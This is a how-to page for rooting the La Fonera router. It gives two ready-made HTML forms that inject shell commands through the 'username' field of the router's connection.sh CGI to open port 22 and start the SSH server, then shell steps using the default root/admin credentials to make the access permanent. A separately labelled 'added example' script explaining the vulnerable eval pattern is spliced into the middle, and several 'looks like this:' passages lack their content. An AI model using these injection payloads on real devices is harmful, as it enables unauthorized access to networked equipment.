Hacking La Fonera


Inspired by Michael's and Stefan's hack, the FON community found the following way to inject shell commands into the system without using FON's website or opening the unit.

The method presented here WORKS at least with firmware 0.7.0r4 up to 0.7.1r1!

Attention: it does NOT WORK for firmware newer than 0.7.1r1! Hint: if your La Fonera was not originally delivered to you with such a firmware, reset it so that it starts anew with its original firmware. Then do the SSH hack first and apply all firmware updates afterwards, and you will keep your SSH access! :-)

How to hack La Fonera?

To open SSH access and to prevent FON from executing code on your La Fonera, do the following:

Save the following code as "step1.html" on your hard disk:

<html>
<head>
<title>Step 1-2 to open SSH-access to La Fonera</title>
</head>
<body>
<center>
<h1>Open SSH-access to La Fonera</h1>
(Model: FON2100A/B/C & FON2200)
<h2>Works with firmware 0.7.0r4 up to 0.7.1r1</h2>
<h3>Step 1 of 2 for connection via LAN</h3>
<form method="post" action="http://169.254.255.1/cgi-bin/webif/connection.sh" enctype="multipart/form-data">
<input name="username" value="$(/usr/sbin/iptables -I INPUT 1 -p tcp --dport 22 -j ACCEPT)" size="60">
<input type="submit" name="submit" value="Submit" onClick="{this.form.wifimode.value='&quot;;' + this.form.wifimode.value +';&quot;'}">
</form>
</center>
</body>
</html>

And now save this code as "step2.html" on your hard disk:

<html>
<head>
<title>Step 2-2 to open SSH-access to La Fonera</title>
</head>
<body>
<center>
<h1>Open SSH-access to La Fonera</h1>
(Model: FON2100A/B/C & FON2200)
<h2>Works with firmware 0.7.0r4 up to 0.7.1r1</h2>
<h3>Step 2 of 2 for connection via LAN</h3>
<form method="post" action="http://169.254.255.1/cgi-bin/webif/connection.sh" enctype="multipart/form-data">
<input name="username" value="$(/etc/init.d/dropbear)" size="60">
<input type="submit" name="submit" value="Submit" onClick="{this.form.wifimode.value='&quot;;' + this.form.wifimode.value +';&quot;'}">
</form>
</center>
</body>
</html>

Make sure JavaScript is enabled in your browser!
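Why the "$(...)" in the username field above runs on the router: the posted value reaches a shell context where command substitution is expanded. The following is an added example, not code from the original page or from FON; "vulnerable_set" is an assumed stand-in for the connection.sh handler (the real script is not reproduced here), and "safe_set" shows the input check that would have stopped it.

```shell
#!/bin/sh
# Added example, not from the original page. "vulnerable_set" is a
# hypothetical stand-in for a CGI handler that evaluates the posted
# "username" value in a shell context; the real connection.sh is assumed,
# not reproduced.

# Vulnerable pattern (assumed): the value is spliced into a command line
# that is then evaluated, so "$(...)" inside the field executes.
vulnerable_set() {
    username="$1"
    eval "_stored=\"$username\""   # unsafe interpolation
    printf '%s' "$_stored"
}

# Hardened pattern: whitelist the characters a username may contain and
# refuse everything else, so shell metacharacters never reach eval.
# Returns 0 and prints the value when accepted, 1 when rejected.
safe_set() {
    case "$1" in
        ''|*[!A-Za-z0-9_.@-]*) return 1 ;;   # empty or forbidden character
    esac
    _stored="$1"
    printf '%s' "$_stored"
}

# Demonstration on a constructed input (echo stands in for a real command).
payload='root$(echo INJECTED)'
echo "vulnerable handler stored: $(vulnerable_set "$payload")"   # rootINJECTED
if safe_set "$payload" >/dev/null; then
    echo "hardened handler: accepted"
else
    echo "hardened handler: rejected"
fi
```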

Set your computer's LAN interface to IP 169.254.255.2, subnet mask 255.255.255.0 and gateway 169.254.255.1. Leave the DNS server fields empty! Now connect your La Fonera to your computer via LAN and power it on.

Once connected, open the pages "step1.html" and "step2.html" in your browser; you should see the following:

Now click the SUBMIT button on the first page, authenticate with username "root" and password "admin" (FON defaults) and wait until the browser has finished loading.

Then switch to the second page (page 02) and click its SUBMIT button.

Now you are ready to connect to your La Fonera via SSH. Connect with PuTTY via SSH (SSH 1) to IP 169.254.255.1 (La Fonera) and log in with username "root" and password "admin" (FON defaults).

After that, do the following to enable shell access permanently:

mv /etc/init.d/dropbear /etc/init.d/S50dropbear
vi /etc/firewall.user

Press "i" (insert) and edit the firewall settings by uncommenting the two lines in the SSH section, so that it looks like this:

Now save your work by pressing "ESC", typing ":wq" (write and quit) and pressing ENTER. You can now reboot La Fonera with the command "reboot" followed by ENTER, or execute these two commands instead:

/etc/init.d/S50dropbear
/etc/firewall.user

Last but not least, you should prevent FON from executing code on your box by changing the last lines of the script

vi /bin/thinclient

to look like this:

Now save your work by pressing "ESC", typing ":wq" (write and quit) and pressing ENTER. You can now close your SSH connection (and exit PuTTY) with the command "exit" followed by ENTER.

Now only you have full access to your box ... :-)